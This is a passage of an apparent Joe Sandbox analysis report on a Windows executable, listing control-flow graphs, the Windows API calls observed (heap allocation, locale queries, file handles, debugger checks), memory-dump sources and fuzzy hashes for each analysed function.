                                                                                                                                                                                                                                                              control_flow_graph 184 2dff89-2dff8e 185 2dff90-2dffa8 184->185 186 2dffaa-2dffae 185->186 187 2dffb6-2dffbf 185->187 186->187 188 2dffb0-2dffb4 186->188 189 2dffd1 187->189 190 2dffc1-2dffc4 187->190 191 2e002b-2e002f 188->191 194 2dffd3-2dffe0 GetStdHandle 189->194 192 2dffcd-2dffcf 190->192 193 2dffc6-2dffcb 190->193 191->185 195 2e0035-2e0038 191->195 192->194 193->194 196 2e000d-2e001f 194->196 197 2dffe2-2dffe4 194->197 196->191 199 2e0021-2e0024 196->199 197->196 198 2dffe6-2dffef GetFileType 197->198 198->196 200 2dfff1-2dfffa 198->200 199->191 201 2dfffc-2e0000 200->201 202 2e0002-2e0005 200->202 201->191 202->191 203 2e0007-2e000b 202->203 203->191
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,002DFE78,002F4948), ref: 002DFFD5
                                                                                                                                                                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,002DFE78,002F4948), ref: 002DFFE7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                                                                                                              • Opcode ID: 4a1f843da19a903b1bd000b9b5f4ed479cf5c637bedeb1b50084ac924248e7f3
                                                                                                                                                                                                                                                              • Instruction ID: 394cec74056aab0534757eacc2abfa80927967687f428e37a549ed15da1d50ef
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a1f843da19a903b1bd000b9b5f4ed479cf5c637bedeb1b50084ac924248e7f3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A911A2725247924AC7308E3EDDC8732BA94A756330B38072AD1B786AF1C2A0D9A2D244

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 204 2d136e-2d13b1 call 2dce80 call 2d197e 209 2d14c9-2d14ce 204->209 210 2d13b7-2d13fa 204->210 213 2d14f0-2d1532 call 2d1ab6 call 2d1a10 call 2d29c6 209->213 211 2d13fc-2d1404 210->211 212 2d144e-2d1463 call 2d408b 210->212 211->212 215 2d1406-2d1409 211->215 217 2d1466-2d147b 212->217 218 2d140d-2d1425 call 2d19d8 215->218 220 2d147d-2d1485 217->220 221 2d14c0-2d14c7 217->221 227 2d142b-2d1442 218->227 228 2d14d0-2d14d5 218->228 220->221 224 2d1487-2d1489 220->224 225 2d14e0-2d14ec 221->225 230 2d148a-2d14a5 call 2d19d8 224->230 225->213 227->218 231 2d1444-2d144c 227->231 228->225 235 2d14d7-2d14dc 230->235 236 2d14a7-2d14be 230->236 231->212 235->225 236->221 236->230
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4218353326-0
                                                                                                                                                                                                                                                              • Opcode ID: d6c61d44a278695f9d2700ac1a6f80f9cd0bee6116fbcf899ab3fce22b3fc2cf
                                                                                                                                                                                                                                                              • Instruction ID: 2927e9077bfe49d3fc77970d5d52c75f227e0f781c2c0496a453e0e40e96e18f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6c61d44a278695f9d2700ac1a6f80f9cd0bee6116fbcf899ab3fce22b3fc2cf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9351AE313142049FC714DF6CC994B6AB7E2EF88328F198669E969CB792D630ED25CB41

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 238 2d3c29-2d3c43 239 2d3c4c-2d3c54 238->239 240 2d3c45-2d3c47 238->240 242 2d3c75-2d3c79 239->242 243 2d3c56-2d3c60 239->243 241 2d3d25-2d3d32 call 2d29c6 240->241 246 2d3c7f-2d3c90 call 2d44b9 242->246 247 2d3d21 242->247 243->242 249 2d3c62-2d3c73 243->249 254 2d3c98-2d3ccc 246->254 255 2d3c92-2d3c96 246->255 251 2d3d24 247->251 252 2d3cee-2d3cf0 249->252 251->241 252->251 261 2d3cce-2d3cd1 254->261 262 2d3cf2-2d3cfa 254->262 256 2d3cdf call 2d35da 255->256 259 2d3ce4-2d3ceb 256->259 259->252 261->262 263 2d3cd3-2d3cd7 261->263 264 2d3cfc-2d3d0d call 2dc578 262->264 265 2d3d0f-2d3d1f 262->265 263->247 266 2d3cd9-2d3cdc 263->266 264->247 264->265 265->251 266->256
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d32b29ab517e5f2b9509cbf331bbcc8176113114b941b772582734ff471330f8
                                                                                                                                                                                                                                                              • Instruction ID: c2d212ecc3e2fb63f42cbceba795d9e1ff71d6e49e81416f52108ce386d6eb24
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d32b29ab517e5f2b9509cbf331bbcc8176113114b941b772582734ff471330f8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4631807692011AAFCB14DF68D8849EDB7B9BF09320B14426BE512E3390D731FE64CB91

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 269 2d3c1b-2d3c20 270 2d3c6e-2d3c74 269->270 271 2d3c22-2d3c28 call 2d8773 269->271 273 2d3bf9-2d3c08 270->273 274 2d3c76 270->274 276 2d3c78-2d3c80 274->276 277 2d3cc4-2d3ccc 274->277 276->277 279 2d3cce-2d3cd1 277->279 280 2d3cf2-2d3cfa 277->280 279->280 281 2d3cd3-2d3cd7 279->281 282 2d3cfc-2d3d0d call 2dc578 280->282 283 2d3d0f-2d3d1f 280->283 284 2d3cd9-2d3cdf call 2d35da 281->284 285 2d3d21 281->285 282->283 282->285 287 2d3d24-2d3d32 call 2d29c6 283->287 294 2d3ce4-2d3cf0 284->294 285->287 294->287
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3988221542-0
                                                                                                                                                                                                                                                              • Opcode ID: 98138d20fc0895d038ff9b386b8bad229d0df40a1662b831bfe8d0ae9c6d563d
                                                                                                                                                                                                                                                              • Instruction ID: 265b8d9ef2c3286462cf435f9bf3fda4b0d9ce713f3e4916080015072e7d710c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98138d20fc0895d038ff9b386b8bad229d0df40a1662b831bfe8d0ae9c6d563d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AF0283A6382574ACF05CE78E9667ACBB51FF86334B24816FD412D96D1CA134E71CA12

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 296 2de531-2de53d 297 2de56f-2de57a call 2dad6d 296->297 298 2de53f-2de541 296->298 306 2de57c-2de57e 297->306 300 2de55a-2de56b RtlAllocateHeap 298->300 301 2de543-2de544 298->301 302 2de56d 300->302 303 2de546-2de54d call 2db92d 300->303 301->300 302->306 303->297 308 2de54f-2de558 call 2d8f08 303->308 308->297 308->300
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,002D31E1,002D186A,?,002D60C1,002D186C,002D186A,?,?,?,002D3181,002D31E1,002D186E,002D186A,002D186A,002D186A), ref: 002DE563
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 68c32bdaa639d620b760721b71555b6d1913a7ce38d399330cb6d1fbf3a6e08b
                                                                                                                                                                                                                                                              • Instruction ID: a6511b0b8af8ed0636e5228660a021f471e9eb04ba5e94b33b6bd13067d0c327
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68c32bdaa639d620b760721b71555b6d1913a7ce38d399330cb6d1fbf3a6e08b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAE0E57193155656DF317E66BC05B6A36489F017F4F970123EC059F7D1EBA1CD2085B0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,002E2B49,00000002,00000000,?,?,?,002E2B49,?,00000000), ref: 002E3211
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,002E2B49,00000002,00000000,?,?,?,002E2B49,?,00000000), ref: 002E323A
                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,002E2B49,?,00000000), ref: 002E324F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                              • Opcode ID: 15c81e4489b8500c33f0126c98833ce34ef6ddf58c373b9fc10f9a859dc8f2a7
                                                                                                                                                                                                                                                              • Instruction ID: 237960d1c2f046294363dc51b0be615234182c389cd04c0aa4d0aba183850163
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15c81e4489b8500c33f0126c98833ce34ef6ddf58c373b9fc10f9a859dc8f2a7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C421C9326A0182B6DB34CF57D90DBA773A6AF50B527964428EE4ECB110E772DF60D350
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002E2B1B
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 002E2B59
                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 002E2B6C
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002E2BB4
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002E2BCF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                                                              • Opcode ID: b0831ed7e7bb694bdecda9048cecb770d61a7b63cd9d4801cac7ded139b67215
                                                                                                                                                                                                                                                              • Instruction ID: 2bbe8ce9434bb5dda2b8b0f5c00dacb2303f3fea280d0dd61effe173b9ee39d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0831ed7e7bb694bdecda9048cecb770d61a7b63cd9d4801cac7ded139b67215
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E951A171A60256EBEF20DFA6DC45BBE77BCBF04700F944069A512EB250DBB09918CB60
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E384A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                                              • Opcode ID: e76c5a12f355b9e6152e2849a78fcd610adc87deeb2a2f4d7b786dec890e6fdc
                                                                                                                                                                                                                                                              • Instruction ID: d6ca94ecb2720dd693928da8c3fe5c49979c1429619a6486a91eac99a1afef4b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e76c5a12f355b9e6152e2849a78fcd610adc87deeb2a2f4d7b786dec890e6fdc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 427106B19951A95FDF20EF29DC8DAFAB7B8AF05301F9441DAE04997251DB318F908F10
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002D502C
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 002D50F8
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002D5111
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 002D511B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                                              • Opcode ID: 6f76318277b11cf0f59dc0cafdd474805ebbd1bbe0fde4422674ce8210a01a52
                                                                                                                                                                                                                                                              • Instruction ID: 846e5b8873a68f6ddf5509b6379a5e1a174e8437af9f70570227ad6b54f4d85c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f76318277b11cf0f59dc0cafdd474805ebbd1bbe0fde4422674ce8210a01a52
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A31F8B5D152299BDF20EF64D9497CDBBB8AF08300F1041AAE40DAB250EB719B85CF45
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002E2D53
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002E2D9D
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002E2E63
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                                                                                                              • Opcode ID: f994bc6f58ac4af1aca2693a7623ad44aa5ea3ea0b9d0d443cd114cbd00678d6
                                                                                                                                                                                                                                                              • Instruction ID: e2d4104f7ee4781a34d73aee25f8554ee9f163a73c217cfc9d5c1d8020afe3c9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f994bc6f58ac4af1aca2693a7623ad44aa5ea3ea0b9d0d443cd114cbd00678d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9061BF319B0157DFDB289F26CD82BAA77A8EF04300F54417AE906C6685E774E964CB50
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,002D31E1), ref: 002DB5B1
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,002D31E1), ref: 002DB5BB
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(002D1542,?,?,?,?,?,002D31E1), ref: 002DB5C8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
